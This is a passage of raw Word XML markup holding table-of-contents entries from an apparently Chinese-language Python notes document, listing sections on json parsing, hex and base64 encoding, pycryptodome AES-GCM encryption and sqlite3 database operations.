              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779943 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>481</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63846AB8" w14:textId="5525F296" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779944" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779944 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>482</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69FEF74C" w14:textId="51FAAF79" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779945" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779945 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>482</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7562125F" w14:textId="7FE05E4C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779946" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>strict</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>允许解析控制字符</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779946 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>483</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E67B8B4" w14:textId="653CE061" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779947" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>字符串前面加</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>允许解析控制字符</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779947 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>483</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C25A455" w14:textId="203E828D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779948" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>列表和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>转换</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779948 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>483</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B1E5401" w14:textId="39634438" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779949" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>字符串的编码解码：如</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>hex</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779949 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>484</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65897F68" w14:textId="083B9EB5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779950" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>binascii</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：对现有字符串编码解码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779950 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>484</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66E998D6" w14:textId="3DF05DE9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779951" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>hex</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>编码解码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779951 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>484</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A9944B3" w14:textId="4D63EF38" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779952" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>base64</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>编码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779952 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>485</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54ED63A3" w14:textId="5C2960A8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779953" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pycryptodome:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>加密解密</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779953 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>485</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32145189" w14:textId="06CB282F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779954" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AESGCM</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>加密解密</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779954 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>485</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5088CF22" w14:textId="0ADB35A2" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779955" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>sqlite3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779955 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>487</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B7F2771" w14:textId="6488E003" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779956" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>初始化、连接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779956 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>487</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4818D698" w14:textId="2B0057B8" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779957" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>关闭</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cur</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>及</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>conn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779957 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>487</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BED5610" w14:textId="7E42507F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779958" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>执行操作</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779958 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>488</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B0BA3A4" w14:textId="273EA82C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779959" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>回滚</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779959 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>488</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68919FEB" w14:textId="616CF5E9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779960" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>查询数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
